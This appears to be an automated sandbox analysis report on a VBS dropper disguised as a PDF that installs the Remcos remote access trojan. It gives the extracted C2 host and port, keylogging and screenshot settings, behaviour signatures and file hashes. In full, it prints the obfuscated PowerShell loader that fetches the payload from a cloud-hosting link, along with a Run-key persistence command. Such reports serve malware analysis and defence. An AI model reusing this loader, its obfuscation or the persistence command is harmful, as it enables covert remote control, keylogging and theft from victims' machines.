Overview

overview

10

Static

static

1

412300061474pdf.vbs

windows7-x64

10

412300061474pdf.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    95s
  • max time network
    100s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2024 08:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    412300061474pdf.vbs

  • Size

    16KB

  • MD5

    66e9e95985918197cabcedecef2d981d

  • SHA1

    4d3acf394fc1825d1f89905ff9950cfc297d813a

  • SHA256

    4ee92a6f7eee02311151d4e57a6b22e18d610a214b4a6274ffd73d3ce7fdb759

  • SHA512

    16efce7ecf0dae7fa63030b404ea60b2801119df2297b05ceba7b7ba0e3d90d3145b2e34f005a10deb78f50b2445498b2d9936f5c33582e0415160cfb8b6b6f9

  • SSDEEP

    384:yMEYHgUWl/aKYbYHfQl3pngujAtHKeGEa47Yi+c:mYHgUWgKrHfSNgujAhGEhYi/

Score
10/10
remcosremotehostdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

5nd42h78s.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-J5NDOL

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\412300061474pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Histomorphological='Spisesituationer';;$Chieve='Conynge';;$Andenklasseskuphoers='Drivbnkenes';;$Juchart='Overbitterness205';;$Tyrannizer='Unbars';;$Subjektets=$host.Name;function Udkobles($raadmandsordning){If ($Subjektets) {$dogeysriarteaceae=4} for ($dogeys=$dogeysriarteaceae;;$dogeys+=5){if(!$raadmandsordning[$dogeys]) { break }$Tilbagesendtes+=$raadmandsordning[$dogeys]}$Tilbagesendtes}function Stberier($Revisionsinstitutter){ .($Boardingkortets) ($Revisionsinstitutter)}$Superangelic157=Udkobles 'SnakNCos eLu tT ban.MaalwPol eTre B ParCMikrlKoldIAdame DaaNAcutt';$Campanula15=Udkobles ' AntM.ykko AllzKontiMandlSpaclM taaKart/';$Backtender=Udkobles 'ArchTLydklsygesreve1Frem2';$Dampmaskiner=' Hos[,aniNrusseDenstIn.i.Elsks VageLam,rC lev ForIProlc UnpE PaspOve oB dnIBukpN ockTSykuMMa.iAErhvnOuseAKlunGMol e oinrForg] nr:refo: OvesRecoE Pecc AskU Feor,engIRadut .ecY HjepWaneR SelOTil TSuerONixicGlasoRdnilunde=Publ$ RemB,tolA VorcTwankBlabTSureeAandN PredAndeE GenR';$Campanula15+=Udkobles ' vol5Terr. ild0Bery ,ort(Her WK.ssiBlodnA tvdSprgo,utcwAbsosVel TillNNourTDisc Unsy1Apyr0Chil.Mant0Meta; ect NatuWSknhiAppen O e6Ove.4Nond; Dyr C loxT im6Malp4 Sky;Bank UnbrUnprv S,r:Port1Samm3Bra 1H lb.inds0Skrm)Preo ednG F re.hifcDispkTorcoudpo/Han.2Afsk0Siou1 Lid0Spen0 ja 1bev 0vili1blaa VieFUnp irnn.r ReneFis.fLnreoma rxTjen/ en1Over3Ut,l1.rbe.Impr0';$Katastrofale=Udkobles 'iod,UTro sOverE E oRw,en- PhoaKillg Ko eHemiNudv,T';$graylags=Udkobles ' Co.hDulytS altMocapNyctsVrd :immu/None/PromdNeverHypoiUnscvMisfe Ge .IllugSim,oDeceo G ygShorlInc eR qu.FeyncArbeoVoldm pis/ UdeuUnspcOdon? toueIsotxMelapF,nmou derFacetBjni=D nsdUnduoDul w Minn Dagl KaooGy,naStikdUdst&Pan iBismdBeto=,udy1GlatZDomin AllcmediOpl gLOpoeTF yvtPlakIMic,bRidsyD esxQ ohiSammi IdeL NonFst.aU SnbiN dsLAflelKassbBrug9AeroHHaan0F elCDeutpE gay PriMStarFsm kA LettEufoe outm';$Frigrelsestids=Udkobles 'gess>';$Boardingkortets=Udkobles ' SlyIRub,eMestX';$Sabelslugerne='Buksenederdel';$Ltemaskine20='\Patriarkernes.Sty';Stberier (Udkobles ',ste$ PowgMedll Preo Bu bBeskaLu cLTame: B fmSepaiRu,lN npgFa tl GlaeRankD Fa.LS,xoyPed 2ti,b0Dani5A to= Zin$KongeCycaNTi sVKron: ActaadjupTalepL.wbD ,kaa CheTBalaa oos+Vaas$ ,calN.netChane UnfmSl uaGuntSTrnakUnreiBr nNTeleELeer2 Ud,0');Stberier (Udkobles 'Se,i$Ta wgIndfL t sO LoaBMicrA MeglLder: ForgIndduLoo dDiskeTid,bsl giSalmLIn hL ,reECo dd nteeIncoRKlap=p lp$KatagKoboRAdskaSkriYC ulLPol a Pr,G CroSTilh.Ov rsFodfPKab L Bs,ISnu,TAfta( Hyd$Eparf UdpR De IMotegPrydrLimpeTamblOlisSUnd e Do.sEftetVensiDroud BooSY,gi)');Stberier (Udkobles $Dampmaskiner);$graylags=$Gudebilleder[0];$Faresernes=(Udkobles 'Frit$Wat.gLgeaL PerOAge,BMe.aaO enL Cal:FlanCM.duoExceND viVKy,ieGui.NHemitpostiGlycooph nFrikiKlkkSperiELyd =CochNOuttE ranWUnst- FloOKomeBDiedJVagaERebeCGratTC,rr .entSF,rly AflsDu atCounE Co.m Tit. Afs$ BoaSUdprUS bpPparaeHallrRibaa Me n Jo,g dslEWa.tLElemiUni,cStal1.fsl5Podz7');Stberier ($Faresernes);Stberier (Udkobles ' Gem$.wotC Ka o SubnJuvev StreAkt,nShoetLepiiAa eoTitanP.riiVandsa bue rer.GoalHGr,pe Anla RindP,tkeDiplrJustsHa t[ id$ForpKGaveasac,tStevaDes,s erhtLejer Sido Prof orlafrnvlRoseePeri]Gtes=Mand$Re,uCAgglaB lamSkadpHeara.idinVie uWondlSpekaV lk1 Wi,5');$Tvangsfodrer=Udkobles 'Retn$hjspCEroboNeapn ForvD mmeA,tinAmput iliiPe,ao tranFlagisrres Prie,gra.c,avDrhizooutbwLegenSikklNonco knaindvdEx,rFSulfiModtl SerePris( Aut$D aggP rirUfina enuyMet,l MeeaDorbgIntasEksk,Conc$ rheP rnehVeloeMoronTreva AllzVideo Boon LfleUnal)';$Phenazone=$Mingledly205;Stberier (Udkobles ' onc$O deGmisbLBortOSm.nBcopua afsLNepe: ilf.ubeoHavbR rejMFalse.allr radi BalNb usGEcuaEOmstRDo yn,artEK epsBagg=Over( AfbTtomle StaSDownTKaar- KonpDec As.antTradh,yve Tegn$ArmlpSam,hremieBeskNLandAFl nzAutoOBjrgnTrooETeks)');while (!$Formeringernes) {Stberier (Udkobles ' Qu.$ nreg arlSvamoSa ib,egea .holCera: RekDVi,iaQ aknOrgaeExplrAnson PoceBrass.met=Unds$ResuF.ommlBugsoBefotPerstBorteSport') ;Stberier $Tvangsfodrer;Stberier (Udkobles 'I.exSP astIndkAAu trNo atTils-ImpespolyLGallE O,teGastp pec cutu4');Stberier (Udkobles 'Impa$Fra gEv rlBowloLameBBegra Pe,Lt.dr:AssuF UniO entRPokimFiffeDaglRInveiScarnSubag KonERestROpb nMinaEmiscsKomm= man(OmprT roeForuSMicrTMeta-PrivpWhe,AFejlTPlouHH,xa Dil$EkspPDra.hSa.tEO spNI tra A.cZ H,iO Ildn,inuE I.f)') ;Stberier (Udkobles 'Gele$S atgMultlLok o,eboBCoscABalllAs.r: ataCN drLDelfIRsonnApneCFyreHp sti .isnMo.sGp.ea= Jor$ Pi.gRegeLAtelOBo,ib SotaRec LSlng:MajveFlers BirT BonhBorgEFulltSickOBastl konoKusig Tr.yoeso+ Fly+Deip% Sor$ CruGHaemuG,anDBredE,ivsBResuIforeLBek LMangeunskD SatESa eRS.ee. TutCSextoGrunuMadan noT') ;$graylags=$Gudebilleder[$Clinching]}$Sanseligheden=295843;$Ensilerendes=29834;Stberier (Udkobles 'Ufor$Zyg g M nl Rago KloBFilmAUskalKlud:GeraTMiljrExtrigaf CDi cHSelsIIndsnB llO ,ynSVaabeOutfDM,sa app=Sple Plu g.atee MtntMinu-C laCAntioCongNMgteTEfteESkrmnPar tTilb Tveb$UnfoPUnp hEstreHjl NreadaVeneZ .tno SunN isbe');Stberier (Udkobles 'Live$ U.sg En l BeroGimmb St a heelForr:CabbADextdGreevFustePaasr PrebGe,tiAlgeeForgr embnterreMac s P,p prot= St, Enda[ erS UdfyEjlas nomt FraeFodem,phr.P.enCSyncoTalenMadrv An,eMinir IditProb]Stea:Selv:kfteF OxarLi eo,ammmlugtB,ruiaAutosFraseHavb6Mot 4T anS.rohtGodsrSeg iInfanSimpgTi.i(T ri$BeewTDomsrA.aniThrocmoorhNoneiUn,enKa poHerhs FaceU dedReve)');Stberier (Udkobles 'Peni$AltaG BrolAnhnoHam B amfaForsL Com: ittpBadeEMe cC iniTTidsiSatis PilE lvssRegn1In.r4Tilk0 Lyd A,lv=Mic ius[Sop,Stri.yTrblsTeleTDuraEAdmimPycn.Su,ttDevieIndsXInset,iph.Eve,E InsnDesiCTolvOU dedHyali PavNOv,rG em]Ef e:Balu: MelA TauSUn.iCAfstiAggrIPsor.MarkG Mi e isttNympsSt rTconcrTilrIBrusN Or G Spi(lubr$EvenAK ydDRoomvSprjESil rJingBSysti Be.e eksRPersNLempe NorsDybd)');Stberier (Udkobles 'K ll$BiligAguiLSarkoKon,bSwieA Tytl L,g:ChapPKanoaGrn RDiptTNonbsGeophEy.fR taiCatmNBrusgCataSBo sr AveE.rikGO.kneMoselshire.imen Ted= Ihv$A.rrpReineUd.tcEnigtBi diminiSKu sERea SHemi1Spur4Ones0Sej..ExplSDarnU St.B A ssR erT iscRBud,ISh rN M sgAns,(Fnok$SgelSNavnaBersNAnacsKaskeP rsLbuckI.iscGSkidHKonje dgiDEssieUnfunCrue,Y.ru$ki,deScepn LacS NseiUndeLflageTilfrUrgeERygrNBes DRu eeminisKare)');Stberier $Partshringsregelen;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3056
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Histomorphological='Spisesituationer';;$Chieve='Conynge';;$Andenklasseskuphoers='Drivbnkenes';;$Juchart='Overbitterness205';;$Tyrannizer='Unbars';;$Subjektets=$host.Name;function Udkobles($raadmandsordning){If ($Subjektets) {$dogeysriarteaceae=4} for ($dogeys=$dogeysriarteaceae;;$dogeys+=5){if(!$raadmandsordning[$dogeys]) { break }$Tilbagesendtes+=$raadmandsordning[$dogeys]}$Tilbagesendtes}function Stberier($Revisionsinstitutter){ .($Boardingkortets) ($Revisionsinstitutter)}$Superangelic157=Udkobles 'SnakNCos eLu tT ban.MaalwPol eTre B ParCMikrlKoldIAdame DaaNAcutt';$Campanula15=Udkobles ' AntM.ykko AllzKontiMandlSpaclM taaKart/';$Backtender=Udkobles 'ArchTLydklsygesreve1Frem2';$Dampmaskiner=' Hos[,aniNrusseDenstIn.i.Elsks VageLam,rC lev ForIProlc UnpE PaspOve oB dnIBukpN ockTSykuMMa.iAErhvnOuseAKlunGMol e oinrForg] nr:refo: OvesRecoE Pecc AskU Feor,engIRadut .ecY HjepWaneR SelOTil TSuerONixicGlasoRdnilunde=Publ$ RemB,tolA VorcTwankBlabTSureeAandN PredAndeE GenR';$Campanula15+=Udkobles ' vol5Terr. ild0Bery ,ort(Her WK.ssiBlodnA tvdSprgo,utcwAbsosVel TillNNourTDisc Unsy1Apyr0Chil.Mant0Meta; ect NatuWSknhiAppen O e6Ove.4Nond; Dyr C loxT im6Malp4 Sky;Bank UnbrUnprv S,r:Port1Samm3Bra 1H lb.inds0Skrm)Preo ednG F re.hifcDispkTorcoudpo/Han.2Afsk0Siou1 Lid0Spen0 ja 1bev 0vili1blaa VieFUnp irnn.r ReneFis.fLnreoma rxTjen/ en1Over3Ut,l1.rbe.Impr0';$Katastrofale=Udkobles 'iod,UTro sOverE E oRw,en- PhoaKillg Ko eHemiNudv,T';$graylags=Udkobles ' Co.hDulytS altMocapNyctsVrd :immu/None/PromdNeverHypoiUnscvMisfe Ge .IllugSim,oDeceo G ygShorlInc eR qu.FeyncArbeoVoldm pis/ UdeuUnspcOdon? toueIsotxMelapF,nmou derFacetBjni=D nsdUnduoDul w Minn Dagl KaooGy,naStikdUdst&Pan iBismdBeto=,udy1GlatZDomin AllcmediOpl gLOpoeTF yvtPlakIMic,bRidsyD esxQ ohiSammi IdeL NonFst.aU SnbiN dsLAflelKassbBrug9AeroHHaan0F elCDeutpE gay PriMStarFsm kA LettEufoe outm';$Frigrelsestids=Udkobles 'gess>';$Boardingkortets=Udkobles ' SlyIRub,eMestX';$Sabelslugerne='Buksenederdel';$Ltemaskine20='\Patriarkernes.Sty';Stberier (Udkobles ',ste$ PowgMedll Preo Bu bBeskaLu cLTame: B fmSepaiRu,lN npgFa tl GlaeRankD Fa.LS,xoyPed 2ti,b0Dani5A to= Zin$KongeCycaNTi sVKron: ActaadjupTalepL.wbD ,kaa CheTBalaa oos+Vaas$ ,calN.netChane UnfmSl uaGuntSTrnakUnreiBr nNTeleELeer2 Ud,0');Stberier (Udkobles 'Se,i$Ta wgIndfL t sO LoaBMicrA MeglLder: ForgIndduLoo dDiskeTid,bsl giSalmLIn hL ,reECo dd nteeIncoRKlap=p lp$KatagKoboRAdskaSkriYC ulLPol a Pr,G CroSTilh.Ov rsFodfPKab L Bs,ISnu,TAfta( Hyd$Eparf UdpR De IMotegPrydrLimpeTamblOlisSUnd e Do.sEftetVensiDroud BooSY,gi)');Stberier (Udkobles $Dampmaskiner);$graylags=$Gudebilleder[0];$Faresernes=(Udkobles 'Frit$Wat.gLgeaL PerOAge,BMe.aaO enL Cal:FlanCM.duoExceND viVKy,ieGui.NHemitpostiGlycooph nFrikiKlkkSperiELyd =CochNOuttE ranWUnst- FloOKomeBDiedJVagaERebeCGratTC,rr .entSF,rly AflsDu atCounE Co.m Tit. Afs$ BoaSUdprUS bpPparaeHallrRibaa Me n Jo,g dslEWa.tLElemiUni,cStal1.fsl5Podz7');Stberier ($Faresernes);Stberier (Udkobles ' Gem$.wotC Ka o SubnJuvev StreAkt,nShoetLepiiAa eoTitanP.riiVandsa bue rer.GoalHGr,pe Anla RindP,tkeDiplrJustsHa t[ id$ForpKGaveasac,tStevaDes,s erhtLejer Sido Prof orlafrnvlRoseePeri]Gtes=Mand$Re,uCAgglaB lamSkadpHeara.idinVie uWondlSpekaV lk1 Wi,5');$Tvangsfodrer=Udkobles 'Retn$hjspCEroboNeapn ForvD mmeA,tinAmput iliiPe,ao tranFlagisrres Prie,gra.c,avDrhizooutbwLegenSikklNonco knaindvdEx,rFSulfiModtl SerePris( Aut$D aggP rirUfina enuyMet,l MeeaDorbgIntasEksk,Conc$ rheP rnehVeloeMoronTreva AllzVideo Boon LfleUnal)';$Phenazone=$Mingledly205;Stberier (Udkobles ' onc$O deGmisbLBortOSm.nBcopua afsLNepe: ilf.ubeoHavbR rejMFalse.allr radi BalNb usGEcuaEOmstRDo yn,artEK epsBagg=Over( AfbTtomle StaSDownTKaar- KonpDec As.antTradh,yve Tegn$ArmlpSam,hremieBeskNLandAFl nzAutoOBjrgnTrooETeks)');while (!$Formeringernes) {Stberier (Udkobles ' Qu.$ nreg arlSvamoSa ib,egea .holCera: RekDVi,iaQ aknOrgaeExplrAnson PoceBrass.met=Unds$ResuF.ommlBugsoBefotPerstBorteSport') ;Stberier $Tvangsfodrer;Stberier (Udkobles 'I.exSP astIndkAAu trNo atTils-ImpespolyLGallE O,teGastp pec cutu4');Stberier (Udkobles 'Impa$Fra gEv rlBowloLameBBegra Pe,Lt.dr:AssuF UniO entRPokimFiffeDaglRInveiScarnSubag KonERestROpb nMinaEmiscsKomm= man(OmprT roeForuSMicrTMeta-PrivpWhe,AFejlTPlouHH,xa Dil$EkspPDra.hSa.tEO spNI tra A.cZ H,iO Ildn,inuE I.f)') ;Stberier (Udkobles 'Gele$S atgMultlLok o,eboBCoscABalllAs.r: ataCN drLDelfIRsonnApneCFyreHp sti .isnMo.sGp.ea= Jor$ Pi.gRegeLAtelOBo,ib SotaRec LSlng:MajveFlers BirT BonhBorgEFulltSickOBastl konoKusig Tr.yoeso+ Fly+Deip% Sor$ CruGHaemuG,anDBredE,ivsBResuIforeLBek LMangeunskD SatESa eRS.ee. TutCSextoGrunuMadan noT') ;$graylags=$Gudebilleder[$Clinching]}$Sanseligheden=295843;$Ensilerendes=29834;Stberier (Udkobles 'Ufor$Zyg g M nl Rago KloBFilmAUskalKlud:GeraTMiljrExtrigaf CDi cHSelsIIndsnB llO ,ynSVaabeOutfDM,sa app=Sple Plu g.atee MtntMinu-C laCAntioCongNMgteTEfteESkrmnPar tTilb Tveb$UnfoPUnp hEstreHjl NreadaVeneZ .tno SunN isbe');Stberier (Udkobles 'Live$ U.sg En l BeroGimmb St a heelForr:CabbADextdGreevFustePaasr PrebGe,tiAlgeeForgr embnterreMac s P,p prot= St, Enda[ erS UdfyEjlas nomt FraeFodem,phr.P.enCSyncoTalenMadrv An,eMinir IditProb]Stea:Selv:kfteF OxarLi eo,ammmlugtB,ruiaAutosFraseHavb6Mot 4T anS.rohtGodsrSeg iInfanSimpgTi.i(T ri$BeewTDomsrA.aniThrocmoorhNoneiUn,enKa poHerhs FaceU dedReve)');Stberier (Udkobles 'Peni$AltaG BrolAnhnoHam B amfaForsL Com: ittpBadeEMe cC iniTTidsiSatis PilE lvssRegn1In.r4Tilk0 Lyd A,lv=Mic ius[Sop,Stri.yTrblsTeleTDuraEAdmimPycn.Su,ttDevieIndsXInset,iph.Eve,E InsnDesiCTolvOU dedHyali PavNOv,rG em]Ef e:Balu: MelA TauSUn.iCAfstiAggrIPsor.MarkG Mi e isttNympsSt rTconcrTilrIBrusN Or G Spi(lubr$EvenAK ydDRoomvSprjESil rJingBSysti Be.e eksRPersNLempe NorsDybd)');Stberier (Udkobles 'K ll$BiligAguiLSarkoKon,bSwieA Tytl L,g:ChapPKanoaGrn RDiptTNonbsGeophEy.fR taiCatmNBrusgCataSBo sr AveE.rikGO.kneMoselshire.imen Ted= Ihv$A.rrpReineUd.tcEnigtBi diminiSKu sERea SHemi1Spur4Ones0Sej..ExplSDarnU St.B A ssR erT iscRBud,ISh rN M sgAns,(Fnok$SgelSNavnaBersNAnacsKaskeP rsLbuckI.iscGSkidHKonje dgiDEssieUnfunCrue,Y.ru$ki,deScepn LacS NseiUndeLflageTilfrUrgeERygrNBes DRu eeminisKare)');Stberier $Partshringsregelen;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2552
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Spillebulers150" /t REG_EXPAND_SZ /d "%Kinetogenesis% -windowstyle 1 $Nonunited=(gp -Path 'HKCU:\Software\Pelion\').tilmeldende;%Kinetogenesis% ($Nonunited)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2800
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Spillebulers150" /t REG_EXPAND_SZ /d "%Kinetogenesis% -windowstyle 1 $Nonunited=(gp -Path 'HKCU:\Software\Pelion\').tilmeldende;%Kinetogenesis% ($Nonunited)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2908

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    a871c5d38b23acd1b5c3f715265f4e09

    SHA1

    cf97fb4eebf8fcc44a0e34695d84d03e6ae0a6f9

    SHA256

    fcfcfb6d32be1948a59cf91ebe2b750a9ba674eecb235aa162be4d3d13022575

    SHA512

    07c1d2018e02a1075217c74da2bf96acb3888bc409ff020e706daf15d850451eb3a6b5c0b6c936d17e287583057c274fe28564e7b2cd2b95b0c8a95cc2011f16

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabE967.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarE467.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0IX80WFJW55OMLDIEMS7.temp
    Filesize

    7KB

    MD5

    9a3b90d447ff550724a23f5da120c2c8

    SHA1

    5d8be143563f7c1b4e3b8db817ba58c5cb65c467

    SHA256

    6eabb2070e3355ef3a4dc42bea46d27caef6f53d57198ff228fd92bc66e22142

    SHA512

    30dddc02e19c81f9c7ee3a8d658b267349d8997a94799205f8e0b9704cdfd1972f0a2f90445f0c0550e7d6fbd16d41ca865fa1ce783a568ae17c826e396cb3ed

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Patriarkernes.Sty
    Filesize

    424KB

    MD5

    5dcdd64f78f54a5547851c6cefb45a56

    SHA1

    93f935660c103294b5de3c515a26af942cd8af13

    SHA256

    70d9740b4a50be83e901fae2c5bb0b4f8fa7a897a9e46af62f5cd860100c8a31

    SHA512

    7a84a46f89288d552b4bad1c0400b0ea627e0cbb0dd6ab994797bb222f04e5999448360a3557aad861140539f01f90c237446a3efd4e8676d065b56bbf71a148

    Download Submit

  • memory/956-36-0x00000000061D0000-0x0000000008B38000-memory.dmp

    Filesize

    41.4MB

    Download

  • memory/2552-60-0x0000000000920000-0x0000000001982000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3056-22-0x0000000002360000-0x0000000002368000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3056-27-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3056-29-0x000007FEF5D7E000-0x000007FEF5D7F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3056-30-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3056-32-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3056-26-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3056-25-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3056-24-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3056-23-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/3056-21-0x000000001B360000-0x000000001B642000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/3056-20-0x000007FEF5D7E000-0x000007FEF5D7F000-memory.dmp

    Filesize

    4KB

    Download